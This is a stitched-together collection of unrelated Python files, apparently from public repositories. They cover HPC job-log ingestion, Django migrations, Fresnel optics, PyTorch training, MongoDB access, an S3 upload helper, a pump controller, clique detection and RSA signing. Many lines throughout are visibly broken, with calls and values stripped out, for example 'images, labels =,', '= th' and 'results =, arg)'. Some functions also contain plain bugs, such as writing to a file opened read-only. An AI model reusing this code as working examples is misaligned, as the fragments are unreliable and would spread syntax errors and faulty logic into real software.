line_dict: i_job.ncpus = int(line_dict['no_cpus']) else: i_job.ncpus = -1 if 'no_nodes' in line_dict: i_job.nnodes = int(line_dict['no_nodes']) else: i_job.nnodes = -1 if 'stdout' in line_dict: i_job.stdout = line_dict['stdout'] else: i_job.stdout = [] # i_job.cpu_percent = float(line_dict['cpu_percent'].replace(":", "")) = str(line_dict['owner_group']) i_job.jobname = str(line_dict['jobname']) i_job.user = str(line_dict['owner_uid']) i_job.queue_type = str(line_dict['class']) i_job.cmd_str = None # command line string not available # info not available i_job.time_created = -1 i_job.time_eligible = -1 i_job.memory_kb = -1 accounting_jobs.append(i_job) # remove invalid entries accounting_jobs[:] = [job for job in accounting_jobs if job.time_start != -1] accounting_jobs[:] = [job for job in accounting_jobs if job.time_end != -1] accounting_jobs[:] = [job for job in accounting_jobs if job.time_end >= job.time_start] accounting_jobs[:] = [job for job in accounting_jobs if job.time_queued != -1] accounting_jobs[:] = [job for job in accounting_jobs if job.time_start >= job.time_queued] accounting_jobs[:] = [job for job in accounting_jobs if job.ncpus > 0] accounting_jobs[:] = [job for job in accounting_jobs if job.nnodes > 0] # store the original idx of each job.. for (ii, i_job) in enumerate(accounting_jobs): i_job.idx_in_log = ii accounting_jobs.sort(key=lambda x: x.time_start, reverse=False) # times relative to start of log min_start_time = min([i_job.time_start for i_job in accounting_jobs]) for i_job in accounting_jobs: # print type(i_job.time_queued), type(i_job.time_end), type(i_job.time_start) i_job.runtime = float(i_job.time_end) - float(i_job.time_start) i_job.time_start_0 = i_job.time_start - min_start_time i_job.time_in_queue = i_job.time_start - i_job.time_queued return accounting_jobs def read_epcc_csv_logs(filename_in): """ read CSV logs from EPCC.. """ csv_jobs = [] with open(filename_in, 'rb') as csvfile: csv_dict = csv.DictReader(csvfile, delimiter=',', quotechar='"') for line_dict in csv_dict: i_job = IngestedJob() # if isinstance(line_dict['ctime'], str): # # i_job.time_queued = int(line_dict['ctime']) # i_job.time_queued = int(line_dict['start']) + 999 # will be removed later.. # else: # print "line_dict['ctime']: ", line_dict['ctime'] # i_job.time_queued = int(line_dict['start']) + 999 # will be removed later.. try: i_job.time_queued = int(line_dict['ctime']) except: print(("I didn't recognize ctime {0} as a number".format(line_dict['ctime']))) i_job.time_queued = -1 try: i_job.time_end = int(line_dict['end']) except: print(("I didn't recognize end {0} as a number".format(line_dict['end']))) i_job.time_end = -1 try: i_job.time_start = int(line_dict['start']) except: print(("I didn't recognize start {0} as a number".format(line_dict['start']))) i_job.time_start = -1 try: i_job.ncpus = int(line_dict['ncpus']) except: print(("I didn't recognize start {0} as a number".format(line_dict['ncpus']))) i_job.ncpus = -1 try: i_job.nnodes = int(line_dict['node_count']) except: print(("I didn't recognize start {0} as a number".format(line_dict['node_count']))) i_job.nnodes = -1 # = line_dict['group'].strip() = '' if line_dict['jobname']: i_job.jobname = line_dict['jobname'].strip() else: i_job.jobname = '' if line_dict['jobname']: i_job.user = line_dict['UserID'].strip() else: i_job.user = '' if line_dict['jobname']: i_job.queue_type = line_dict['queue'].strip() else: i_job.queue_type = '' # info not available i_job.time_created = -1 i_job.time_eligible = -1 i_job.memory_kb = -1 i_job.cmd_str = None # command line string not available csv_jobs.append(i_job) # remove invalid entries csv_jobs[:] = [job for job in csv_jobs if job.time_start != -1] csv_jobs[:] = [job for job in csv_jobs if job.time_end != -1] csv_jobs[:] = [job for job in csv_jobs if job.time_end >= job.time_start] csv_jobs[:] = [job for job in csv_jobs if job.time_queued != -1] csv_jobs[:] = [job for job in csv_jobs if job.time_start >= job.time_queued] csv_jobs[:] = [job for job in csv_jobs if job.ncpus > 0] csv_jobs[:] = [job for job in csv_jobs if job.nnodes > 0] # store the original idx of each job.. for (ii, i_job) in enumerate(csv_jobs): i_job.idx_in_log = ii csv_jobs.sort(key=lambda x: x.time_start, reverse=False) # times relative to start of log min_start_time = min([i_job.time_start for i_job in csv_jobs]) for i_job in csv_jobs: # print type(i_job.time_queued), type(i_job.time_end), type(i_job.time_start) i_job.runtime = float(i_job.time_end) - float(i_job.time_start) i_job.time_start_0 = i_job.time_start - min_start_time i_job.time_in_queue = i_job.time_start - i_job.time_queued return csv_jobs class PBSDataSet(IngestedDataSet): def __init__(self, joblist, *args, **kwargs): super(PBSDataSet, self).__init__(joblist, '.', {'cache':False}) # The created times are all in seconds since an arbitrary reference, so we want to get # them relative to a zero-time created_time_list = [j.time_created for j in self.joblist if j.time_created >= 0] self.global_created_time = 0.0 if created_time_list: self.global_created_time = min(created_time_list) start_time_list = [j.time_created for j in self.joblist if j.time_created >= 0] self.global_start_time = 0.0 if start_time_list: self.global_start_time = min(start_time_list) def model_jobs(self): for job in self.joblist: # assert isinstance(job, IngestedJob) assert not job.timesignals # if job.time_created >= 0: # submit_time = job.time_created - self.global_created_time # else: # submit_time = job.time_start - self.global_start_time yield ModelJob( job_name=job.jobname, user_name=job.user, cmd_str=job.cmd_str, queue_name=job.queue_type, time_queued=job.time_queued, time_start=job.time_start, duration=job.time_end-job.time_start, ncpus=job.ncpus, nnodes=job.nnodes, stdout=job.stdout, label=None, ) def ingest_pbs_logs(path, cfg=None): """ Read PBS logs into a dataset """ if not os.path.exists(path): raise ConfigurationError("Specified path to ingest PBS profiles does not exist: {}".format(path)) if not os.path.isfile(path): raise ConfigurationError("Specified path for PBS time_schedule is not a file") jobs = read_pbs_log(path) return PBSDataSet(jobs) def ingest_epcc_csv_logs(path, cfg=None): """ Read PBS logs into a dataset """ if not os.path.exists(path): raise ConfigurationError("Specified path to ingest CSV profiles does not exist: {}".format(path)) if not os.path.isfile(path): raise ConfigurationError("Specified path for CSV time_schedule is not a file") jobs = read_epcc_csv_logs(path) return PBSDataSet(jobs) class AccountingDataSet(IngestedDataSet): def __init__(self, joblist, *args, **kwargs): super(AccountingDataSet, self).__init__(joblist, '.', {'cache':False}) # The created times are all in seconds since an arbitrary reference, so we want to get # them relative to a zero-time self.global_start_time = min((j.time_start for j in self.joblist if j.time_start >= 0)) def model_jobs(self): for job in self.joblist: assert isinstance(job, IngestedJob) assert not job.timesignals # yield ModelJob( # time_start=job.time_start - self.global_start_time, # duration=job.time_end-job.time_start, # ncpus=job.ncpus, # nnodes=job.nnodes, # scheduler_timing=job.time_queued, # stdout=job.stdout # ) yield ModelJob( job_name=job.jobname, user_name=job.user, cmd_str=job.cmd_str, queue_name=job.queue_type, time_queued=job.time_queued, time_start=job.time_start, duration=job.time_end - job.time_start, ncpus=job.ncpus, nnodes=job.nnodes, scheduler_timing=job.time_queued, stdout=job.stdout, label=None, ) def ingest_accounting_logs(path, cfg=None): """ Read PBS logs into a dataset """ if not os.path.exists(path): raise ConfigurationError("Specified path to ingest accounting profiles does not exist: {}".format(path)) if not os.path.isfile(path): raise ConfigurationError("Specified path for accounting log is not a file") jobs = read_accounting_logs(path) return PBSDataSet(jobs)
<filename>course_selection/migrations/<gh_stars>10-100 # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('course_selection', '0020_auto_20150903_0501'), ] operations = [ migrations.RemoveField( model_name='friend_request', name='accepted', ), migrations.AddField( model_name='friend_request', name='status', field=models.CharField(default=b'PEN', max_length=3, choices=[(b'PEN', b'Pending'), (b'ACC', b'Accepted'), (b'REJ', b'Rejected')]), preserve_default=True, ), ]
<filename>ana/ #!/usr/bin/env python # # Copyright (c) 2019 Opticks Team. All Rights Reserved. # # This file is part of Opticks # (see # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """ : analytic reflection expectations ================================================== """ import os, logging log = logging.getLogger(__name__) import numpy as np import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D from opticks.ana.base import opticks_environment from opticks.ana.nbase import count_unique np.set_printoptions(suppress=True, precision=3) def fresnel(x, n1, n2, spol=True): """ """ cx = np.cos(x) sx = np.sin(x) disc = 1. - np.square(n1*sx/n2) qdisc = np.sqrt(disc) pass if spol: num = (n1*cx - n2*qdisc) den = (n1*cx + n2*qdisc) else: num = (n1*qdisc - n2*cx) den = (n1*qdisc + n2*cx) pass return np.square(num/den) def fresnel_factor(seqhis, i, n1, n2, spol=True): """ :param seqhis: history sequence string eg "TO BT BR BT SA" :param n1: refractive index of initial material :param n2: refractive index of material that is transmitted into Not aiming for generality, only works for simple geometries like raindrops, prisms, lens """ seqs = seqhis.split(" ") rx = fresnel(i, n1, n2, spol=spol ) tx = 1 - rx ff = np.ones(len(i)) for step in seqs: #print step if step in ("TO", "SA"):continue if step == "BT": ff *= tx elif step == "BR": ff *= rx else: assert 0, step pass pass return ff def fresnel_s( i, n, method=0): """ sin(i-r) si cr - ci sr -------- = ------------- sin(i+r) si cr + ci sr This form whilst pretty, gives nan at normal incidence, 0/0 """ si = np.sin(i) sr = si/n if method == 0: ci = np.sqrt( 1 - si*si ) cr = np.sqrt( 1 - sr*sr ) num = si*cr - ci*sr den = si*cr + ci*sr else: i = np.arcsin(si) r = np.arcsin(sr) num = np.sin(i - r) den = np.sin(i + r)"i %s r %s num %s den %s " % (i,r,num,den)) pass return np.square(num/den) def fresnel_p( i, n): """ tan(i-r) -------- tan(i+r) """ si = np.sin(i) sr = si/n i = np.arcsin(si) r = np.arcsin(sr) num = np.tan(i - r) den = np.tan(i + r) return np.square(num/den) class Fresnel(object): def __init__(self, n1, n2, dom=None ): if dom is None: dom = np.linspace(0,90,91) n1 = np.asarray(n1) n2 = np.asarray(n2) th = dom*np.pi/180. spol = fresnel(th, n1, n2, True) ppol = fresnel(th, n1, n2, False) pass self.n1 = n1 self.n2 = n2 self.dom = dom = th self.spol_0 = spol self.ppol_0 = ppol #self.alternative_check() self.cen = (dom[:-1] + dom[1:])/2. # avg of bin edge values self.spol = (spol[:-1] + spol[1:])/2. self.ppol = (ppol[:-1] + ppol[1:])/2. self.upol = (self.spol+self.ppol)/2. # unpol? self.brewster = np.arctan(n2/n1)*180./np.pi self.critical = np.arcsin(n1/n2)*180./np.pi def alternative_check(self): """ Alternative angle difference forms, misbehave at normal incidence Otherwise they match """ th = n1 = self.n1 n2 = self.n2 spol_0 = self.spol_0 ppol_0 = self.ppol_0 spol_2 = fresnel_s( th, n2/n1, method=1) spol_3 = fresnel_s( th, n2/n1, method=0) assert np.allclose( spol_0[1:], spol_2[1:] ), np.dstack([spol_0,spol_2, spol_3]) assert np.allclose( spol_0[1:], spol_3[1:] ), np.dstack([spol_0,spol_2, spol_3]) ppol_2 = fresnel_p( th, n2/n1) assert np.allclose( ppol_0[1:], ppol_2[1:] ), np.dstack([ppol_0, ppol_2]) def __call__(self, xd, n): x = xd*np.pi/180. n1 = self.n1 n2 = self.n2 cx = np.cos(x) sx = np.sin(x) disc = 1. - np.square(n1*sx/n2) qdisc = np.sqrt(disc) pass spol = np.square((n1*cx - n2*qdisc)/(n1*cx + n2*qdisc)) ppol = np.square((n1*qdisc - n2*cx)/(n1*qdisc + n2*cx)) return n*(spol*f + (1.-f)*ppol) def pl(self): plt.plot(self.cen, self.spol, label="S (perp)", c="r") plt.plot(self.cen, self.ppol, label="P (para)", c="b") def title(self): return "Fresnel %4.3f/%4.3f " % (self.n1, self.n2 ) def plot(self, fig, ny=1, nx=1, n=1, log_=False): plt.title(self.title()) ax = fig.add_subplot(ny,nx,n) self.angles() legend = ax.legend(loc='upper left', shadow=True) if log_: ax.set_yscale('log') def angles(self): a = self.brewster plt.plot([a, a], [1e-6, 1], 'k-', c="b", lw=2, label="Brewster") a = self.critical plt.plot([a, a], [1e-6, 1], 'k-', c="r", lw=2, label="Critical") if __name__ == '__main__': logging.basicConfig(level=logging.INFO) opticks_environment() n1 = np.array([1.]) n2 = np.array([1.458]) fr = Fresnel(n1,n2) fig = plt.figure() fr.plot(fig, log_=True)
<filename>tests/resources/my_dummy_handlers/<gh_stars>10-100 from oxygen import BaseHandler class MyDummyHandler(BaseHandler): ''' A test handler that throws mismatch argument exception because parse_results expects too many arguments ''' def run_my_dummy_handler(self, result_file): return result_file, 'foo' def parse_results(self, result_file, foo, bar): return { 'name': result_file, 'foo': foo, 'bar': bar }
<filename>app/core/ import logging from typing import Iterable, Type from bson import ObjectId from fastapi import Depends from motor.core import AgnosticClient, AgnosticCollection, AgnosticDatabase from motor.motor_asyncio import AsyncIOMotorClient from pymongo.results import InsertOneResult from app.models import IdentityModel from .settings import Settings, get_settings logger = logging.getLogger(__name__) async def get_db(settings: Settings = Depends(get_settings)): """Initialize database.""" try: client: AgnosticClient = AsyncIOMotorClient(settings.mongo_url) yield client.get_database() finally: client.close() class BaseRepository: """Base repository class.""" collection_name: str = "" model_type: Type[IdentityModel] = IdentityModel def __init__(self, db: AgnosticDatabase = Depends(get_db, use_cache=True)): """Initializer.""" self.col: AgnosticCollection = db[self.collection_name] def _construct(self, attrs: dict) -> model_type: """Construct Pydantic model from Mongo object dict.""" attrs["id"] = str(attrs["_id"]) return self.model_type(**attrs) def _deconstruct(self, obj: model_type) -> dict: """Deconstructs model for Mongo.""" attrs = obj.dict() if attrs.get("id"): attrs["_id"] = ObjectId(attrs["id"]) del attrs["id"] return attrs async def get(self, **attrs) -> model_type: """Get one item.""" db_item: dict = await self.col.find_one(attrs) return self._construct(db_item) if db_item else None async def get_all(self, **attrs) -> Iterable[model_type]: """Get one item.""" db_items: Iterable[dict] = self.col.find(attrs) return [self._construct(i) async for i in db_items] async def create(self, obj: model_type) -> model_type: """Create item.""" res: InsertOneResult = await self.col.insert_one(self._deconstruct(obj)) db_item = await self.col.find_one(res.inserted_id) return self._construct(db_item)
# -*- coding: utf-8 -*- # Generated by Django 1.9.4 on 2016-03-17 12:32 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='orders', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('order_id', models.PositiveIntegerField()), ('order_amount', models.DecimalField(decimal_places=2, max_digits=8)), ('customer', models.CharField(max_length=200, null=True, unique=True, verbose_name=b'Company Name')), ('ship_date', models.DateField(help_text=b'Please use the following format: YYYY/MM/DD.', null=True)), ], ), ]
# coding = utf-8 from inherit_abstract.abstractcollection import AbstractCollection class AbstractDict(AbstractCollection): """ Common data and method implementations for dictionaries. """ def __init__(self, source_collection): """ Will copy items to the collection from source_collection if it's present. """ AbstractCollection.__init__(self) if source_collection: for key, value in source_collection: self[key] = value def __str__(self): return "{" + ", ".join(map(str, self.items())) + "}" def __and__(self, other): """ Returns a new dictionary containing the contents of self adn other. :param other: :return: """ result = type(self)(map(lambda item: (item.key, item.value), self.items())) for key in other: result[key] = other[key] return result def __eq__(self, other): """ Returns True if self equals other, or False otherwise. :param other: :return: """ if self is other: return True if type(self) != type(other) or len(self) != len(other): return False for key in self: if not key in other: return False return True def keys(self): """ Returns a iterator on the keys in the dictionary. :return: """ return iter(self) def values(self): """ Reutrns an iterator on the values in the dictionary. :return: """ return iter(map(lambda key: self[key], self)) def items(self): """ Returns an iterator on the items in the dictionary. :return: """ return iter(map(lambda key: Item(key, self[key]), self)) class Item(object): """ Represents a dictionary item. Supports comparisons by key. """ def __init__(self, key, value): self.key = key self.value = value def __str__(self): return str(self.key) + ":" + str(self.value) def __eq__(self, other): if type(self) != type(other): return False return self.key == other.key def __lt__(self, other): if type(self) != type(other): return False return self.key < other.key def __le__(self, other): if type(self) != type(other): return False return self.key <= other.key
# Generated by Django 2.1.4 on 2019-05-29 11:45 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('daiquiri_metadata', '0024_django2'), ] operations = [ migrations.AddField( model_name='schema', name='published', field=models.DateField(blank=True, null=True, verbose_name='Published'), ), migrations.AddField( model_name='schema', name='updated', field=models.DateField(blank=True, null=True, verbose_name='Updated'), ), migrations.AddField( model_name='table', name='published', field=models.DateField(blank=True, null=True, verbose_name='Published'), ), migrations.AddField( model_name='table', name='updated', field=models.DateField(blank=True, null=True, verbose_name='Updated'), ), ]
<gh_stars>0 import functools from stp_core.loop.eventually import eventually from plenum.common.constants import STEWARD, DOMAIN_LEDGER_ID from plenum.test.pool_transactions.conftest import looper, stewardAndWallet1, \ steward1, stewardWallet, client1, clientAndWallet1, client1Connected from plenum.test.pool_transactions.helper import sendAddNewClient from plenum.test import waits from plenum.test.helper import ensureRejectsRecvd, sdk_send_random_and_check ERORR_MSG = "something went wrong" whitelist = [ERORR_MSG] def testLoggingTxnStateForValidRequest( looper, logsearch, txnPoolNodeSet, sdk_pool_handle, sdk_wallet_client): logsPropagate, _ = logsearch( levels=['INFO'], files=[''], funcs=['propagate'], msgs=['propagating.*request.*from client'] ) logsOrdered, _ = logsearch( levels=['INFO'], files=[''], funcs=['order_3pc_key'], msgs=['ordered batch request'] ) logsCommited, _ = logsearch( levels=['INFO'], files=[''], funcs=['executeBatch'], msgs=['committed batch request'] ) reqs = sdk_send_random_and_check(looper, txnPoolNodeSet, sdk_pool_handle, sdk_wallet_client, 1) req, _ = reqs[0] reqId = str(req['reqId']) assert any(reqId in record.getMessage() for record in logsPropagate) assert any(reqId in record.getMessage() for record in logsOrdered) assert any(reqId in record.getMessage() for record in logsCommited) def testLoggingTxnStateForInvalidRequest( looper, txnPoolNodeSet, clientAndWallet1, client1Connected, logsearch): client, clientWallet = clientAndWallet1 logsPropagate, _ = logsearch( levels=['INFO'], files=[''], funcs=['propagate'], msgs=['propagating.*request.*from client'] ) logsReject, _ = logsearch( levels=['WARNING'], files=[''], funcs=['processReqDuringBatch'], msgs=['encountered exception.*while processing.*will reject'] ) req, wallet = sendAddNewClient(STEWARD, "name", client, clientWallet) ensureRejectsRecvd( looper, txnPoolNodeSet, client, reason="Only Steward is allowed to do these transactions", timeout=waits.expectedReqRejectQuorumTime() ) reqId = str(req.reqId) assert any(reqId in record.getMessage() for record in logsPropagate) assert any(reqId in record.getMessage() for record in logsReject) def testLoggingTxnStateWhenCommitFails( looper, txnPoolNodeSet, steward1, stewardWallet, logsearch): logsPropagate, _ = logsearch( levels=['INFO'], files=[''], funcs=['propagate'], msgs=['propagating.*request.*from client'] ) logsOrdered, _ = logsearch( levels=['INFO'], files=[''], funcs=['order_3pc_key'], msgs=['ordered batch request'] ) logsCommitFail, _ = logsearch( levels=['WARNING'], files=[''], funcs=['executeBatch'], msgs=['commit failed for batch request'] ) req, wallet = sendAddNewClient(None, "name", steward1, stewardWallet) class SomeError(Exception): pass def commitPatched(node, commitOrig, *args, **kwargs): req_handler = node.get_req_handler(ledger_id=DOMAIN_LEDGER_ID) req_handler.commit = commitOrig raise SomeError(ERORR_MSG) excCounter = 0 def executeBatchPatched(node, executeBatchOrig, *args, **kwargs): nonlocal excCounter try: executeBatchOrig(*args, **kwargs) except SomeError: excCounter += 1 node.executeBatch = executeBatchOrig pass def checkSufficientExceptionsHappend(): assert excCounter == len(txnPoolNodeSet) return for node in txnPoolNodeSet: req_handler = node.get_req_handler(ledger_id=DOMAIN_LEDGER_ID) req_handler.commit = functools.partial( commitPatched, node, req_handler.commit ) node.executeBatch = functools.partial( executeBatchPatched, node, node.executeBatch ) timeout = waits.expectedTransactionExecutionTime(len(txnPoolNodeSet)) eventually(checkSufficientExceptionsHappend, retryWait=1, timeout=timeout)) reqId = str(req.reqId) assert any(reqId in record.getMessage() for record in logsPropagate) assert any(reqId in record.getMessage() for record in logsOrdered) assert any(reqId in record.getMessage() for record in logsCommitFail) assert any(ERORR_MSG in record.getMessage() for record in logsCommitFail)
<gh_stars>1-10 import torch from torchvision import models import time ''' Functions related to training model ''' def save_checkpoint(model, optimizer, train_data, arch, save_dir): # TODO COMPLETED: Save the checkpoint'cpu') print("Our model: \n\n", model, '\n') print("The state dict keys: \n\n", model.state_dict().keys()) # Saving the model (The trained model is saved as a checkpoint along with associated # hyperparameters and the class_to_idx dictionary) checkpoint = {'classifier': model.classifier, 'class_to_idx': train_data.class_to_idx, 'state_dict': model.state_dict(), 'arch': arch, 'optimizer': optimizer, 'optimizer_state_dict': optimizer.state_dict()}, save_dir) # TODO COMPLETED: Write a function that loads a checkpoint and rebuilds the model # Loading checkpoints (The function successfully loads a checkpoint and rebuilds the model) def load_checkpoint(model_input): checkpoint = torch.load(model_input) if checkpoint['arch'] == 'vgg16': model = models.vgg16(pretrained=True) elif checkpoint['arch'] == 'densenet121': model = models.densenet121(pretrained=True) model.classifier = checkpoint['classifier'] model.class_to_idx = checkpoint['class_to_idx'] model.load_state_dict(checkpoint['state_dict']) # load the optimizer from saved checkpoint optimizer = checkpoint['optimizer'] optimizer.load_state_dict(checkpoint['optimizer_state_dict']) return model, optimizer # Define Validation function for the model def validate_model(model, validloader, criterion, device): valid_loss = 0 accuracy = 0 # Looping through it, get a batch on each loop # validation pass here for images, labels in validloader: images, labels =, # Forward pass, get our log-probabilities outputs = model.forward(images) # Calculate the loss with the calculated log-probabilities and the labels valid_loss += criterion(outputs, labels) # Calculate accuracy # Output of the network are log-probabilities, need to take exponential for probabilities ps = torch.exp(outputs) top_p, top_class = ps.topk(1, dim=1) equals = top_class == labels.view(*top_class.shape) accuracy += torch.mean(equals.type(torch.FloatTensor)) return valid_loss, accuracy # Training a network: successfully trains a new network on a dataset of images # Model hyperparameters: The training model run based on user set hyperparameters such as training epochs # Training with GPU: The training model allows users to choose training the model based on device (gpu, cpu) def train_model(model, trainloader, validloader, criterion, num_epochs, optimizer, device): # TODO COMPLETED: Build and train your network # Training the network (The parameters of the feedforward classifier are appropriately trained, # while the parameters of the feature network are left static) steps = 0 batch_size = 16 train_losses, valid_losses = [], [] for epoch in range(num_epochs): epoch_start_time = time.time() running_loss = 0 for images, labels in trainloader: # Move input and label tensors to the default device images, labels =, steps += 1 # Clear the gradients, do this because gradients are accumulated optimizer.zero_grad() # Forward pass, then backward pass, then update weights # Forward pass, get our log-probabilities outputs = model.forward(images) # Calculate the loss with the calculated log-probabilities and the labels loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if steps % batch_size == 0: # Validate model valid_loss = 0 accuracy = 0 # set model to evaluation mode for predictions model.eval() # Turn off gradients for validation, saves memory and computations with torch.no_grad(): valid_loss, accuracy = validate_model(model, validloader, criterion, device) train_losses.append(running_loss / len(trainloader)) valid_losses.append(valid_loss / len(validloader)) # Training validation log: The training loss, validation loss, and # validation accuracy are printed out as a network trains print("Epoch: {}/{}.. ".format(epoch + 1, num_epochs), "Training Loss: {:.3f}.. ".format(train_losses[-1]), "Validation Loss: {:.3f}.. ".format(valid_losses[-1]), "Validation Accuracy: {:.3f}%".format((100 * accuracy) / len(validloader))) running_loss = 0 # set model back to train mode model.train() # Calculate and print Epoch duration epoch_time_elapsed = time.time() - epoch_start_time print("Epoch {} Run Time: {:.0f}m {:.0f}s".format(epoch + 1, epoch_time_elapsed // 60, epoch_time_elapsed % 60)) return model, optimizer # TODO COMPLETED: Do validation on the test input data def test_model(model, testloader, device): accuracy = 0 # Turn off gradients for validation, saves memory and computations with torch.no_grad(): # set model to evaluation mode for predictions model.eval() # Looping through it, get a batch on each loop # test validation pass here for images, labels in testloader: images, labels =, outputs = model.forward(images) # Calculate accuracy # Get the class probabilities ps = torch.exp(outputs) top_p, top_class = ps.topk(1, dim=1) equals = top_class == labels.view(*top_class.shape) accuracy += torch.mean(equals.type(torch.FloatTensor)) # set model back to train mode model.train() # Testing Accuracy (The network's accuracy is measured on the test data) print("Test Accuracy: {:.3f}%".format(100 * accuracy / len(testloader)))
from tempfile import mkstemp import os import tinys3 def create_temp_file(data): fd, temp_path = mkstemp() file = open(temp_path, 'r') file.write(data) file.close() os.close(fd) return data def push_to_s3(filepath): s3 = tinys3.Connection(os.environ['AWS_ACCESS_KEY_ID'],os.environ['AWS_SECRET_KEY'],tls=True) f = open(filepath,'rb') s3.upload(filepath, f ,'') return
import logging logger = logging.getLogger(__name__) # Pump rate in mL/s (4.3 L/min) _PUMP_RATE_ML_PER_SEC = 4300.0 / 60.0 # Default amount of water to add to the plant (in mL) when pump manager detects # low soil moisture. DEFAULT_PUMP_AMOUNT = 200 class Pump(object): """Wrapper for a Seaflo 12V water pump.""" def __init__(self, pi_io, clock, pump_pin): """Creates a new Pump wrapper. Args: pi_io: Raspberry Pi I/O interface. clock: A clock interface. pump_pin: Raspberry Pi pin to which the pump is connected. """ self._pi_io = pi_io self._clock = clock self._pump_pin = pump_pin def pump_water(self, amount_ml): """Pumps the specified amount of water. Args: amount_ml: Amount of water to pump (in mL). Raises: ValueError: The amount of water to be pumped is invalid. """ if amount_ml == 0.0: return elif amount_ml < 0.0: raise ValueError('Cannot pump a negative amount of water') else:'turning pump on (with GPIO pin %d)', self._pump_pin) self._pi_io.turn_pin_on(self._pump_pin) wait_time_seconds = amount_ml / _PUMP_RATE_ML_PER_SEC self._clock.wait(wait_time_seconds)'turning pump off (with GPIO pin %d)', self._pump_pin) self._pi_io.turn_pin_off(self._pump_pin)'pumped %.f mL of water', amount_ml) return class PumpManager(object): """Pump Manager manages the water pump.""" def __init__(self, pump, pump_scheduler, moisture_threshold, pump_amount, timer): """Creates a PumpManager object, which manages a water pump. Args: pump: A pump instance, which supports water pumping. pump_scheduler: A pump scheduler instance that controls the time periods in which the pump can be run. moisture_threshold: Soil moisture threshold. If soil moisture is below this value, manager pumps water on pump_if_needed calls. pump_amount: Amount (in mL) to pump every time the water pump runs. timer: A timer that counts down until the next forced pump. When this timer expires, the pump manager runs the pump once, regardless of the moisture level. """ self._pump = pump self._pump_scheduler = pump_scheduler self._moisture_threshold = moisture_threshold self._pump_amount = pump_amount self._timer = timer def pump_if_needed(self, moisture): """Run the water pump if there is a need to run it. Args: moisture: Soil moisture level Returns: The amount of water pumped, in mL. """ if self._should_pump(moisture): self._pump.pump_water(self._pump_amount) self._timer.reset() return self._pump_amount return 0 def _should_pump(self, moisture): """Returns True if the pump should be run.""" if not self._pump_scheduler.is_running_pump_allowed(): return False return (moisture < self._moisture_threshold) or self._timer.expired() class PumpScheduler(object): """Controls when the pump is allowed to run.""" def __init__(self, local_clock, sleep_windows): """Creates new PumpScheduler instance. Args: local_clock: A local clock interface sleep_windows: A list of 2-tuples, each representing a sleep window. Tuple items are datetime.time objects. """ self._local_clock = local_clock self._sleep_windows = sleep_windows def is_running_pump_allowed(self): """Returns True if OK to run pump, otherwise False. Pump is not allowed to run from the start of a sleep window (inclusive) to the end of a sleep window (exclusive). """ current_time = for sleep_time, wake_time in self._sleep_windows: # Check if sleep window wraps midnight. if wake_time < sleep_time: if current_time >= sleep_time or current_time < wake_time: return False else: if sleep_time <= current_time < wake_time: return False return True
__author__ = 'Jason' import itertools from Graph import * from GraphStatistics import * def get_cliques(graph, k, proc_pool): persons = [] for idx in graph.dictionary: persons.append(idx) cliques = [] combinations = itertools.combinations(persons, k) arg = [] for comb in combinations: arg.append((comb, graph)) results =, arg) for result in results: if result[0] == True: cliques.append(result[1]) return cliques def test(arg): combination = arg[0] graph = arg[1] local_comb = list(combination) for idx in combination: others = list(local_comb) others.remove(idx) links = graph.dictionary[idx].links linked_ids = [] for edge in links: linked_ids.append(edge.edge_end) for neighbour in others: if neighbour not in linked_ids: return False, None local_comb.remove(idx) return True, combination def percolation_method(graph, k, proc_pool): l_cliques = get_cliques(graph, k, proc_pool) g_cliques = Graph() for i in range(len(l_cliques)): node = Node(i, [], []) g_cliques.insert_node(node) arg = [] for i in range(len(l_cliques)): arg.append((i, l_cliques, k)) results =, arg) for result in results: for hyper_edge in result: edge = Edge(hyper_edge[1], []) g_cliques.insert_edge(hyper_edge[0], edge) cc = get_connected_components(g_cliques) communities = [] counter = 1 for component in cc: persons = [] for clique_id in component: for p_id in l_cliques[clique_id]: if p_id not in persons: persons.append(p_id) persons.sort() communities.append((counter, persons)) counter += 1 return communities def get_hyper_edges(arg): clique_id = arg[0] l_cliques = arg[1] k = arg[2] result = [] main_clique = l_cliques[clique_id] for i in range(len(l_cliques)): counter = 0 if i != clique_id: for val in main_clique: if val in l_cliques[i]: counter += 1 if counter >= k - 1: result.append((clique_id, i)) return result
from base64 import b64encode from hashlib import sha1 from Crypto.Hash import SHA from Crypto.Signature import PKCS1_v1_5 from Crypto.PublicKey import RSA class Rsa: @classmethod def sign(cls, text, privateKeyContent): digest = rsaKey = RSA.importKey(privateKeyContent) signer = signature = signer.sign(digest) return b64encode(signature) @classmethod def digest(cls, text): hasher = sha1() hasher.update(text) digest = hasher.digest() return b64encode(digest)
<filename> import os import argparse def process_decoded(args): if not os.path.exists(args.result_dir): os.mkdir(args.result_dir) punct = ["/", "`", "+", "-", ";", "-lrb-", "-rrb-", "``", "|", "~", "&quot"] for file in os.listdir(args.decode_dir): file_path = os.path.join(args.decode_dir, file) file_id = int(str(file).split('.')[0]) + 1 res_file = str(file_id) + '.txt' res_path = os.path.join(args.result_dir, res_file) temp = [] with open(file_path, 'r') as fr: text = data = text.split(" ") for word in data: if not word in punct: temp.append(word) with open(res_path, 'w', encoding='utf-8') as fw: fw.write(" ".join(temp)) fw.write('\n') print("Finished: %s" % args.result_dir) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Convert decoded files to commit files') parser.add_argument('--decode_dir', action='store', required=True, help='directory of decoded summaries') parser.add_argument('--result_dir', action='store', required=True, help='directory of submission') args = parser.parse_args() process_decoded(args)
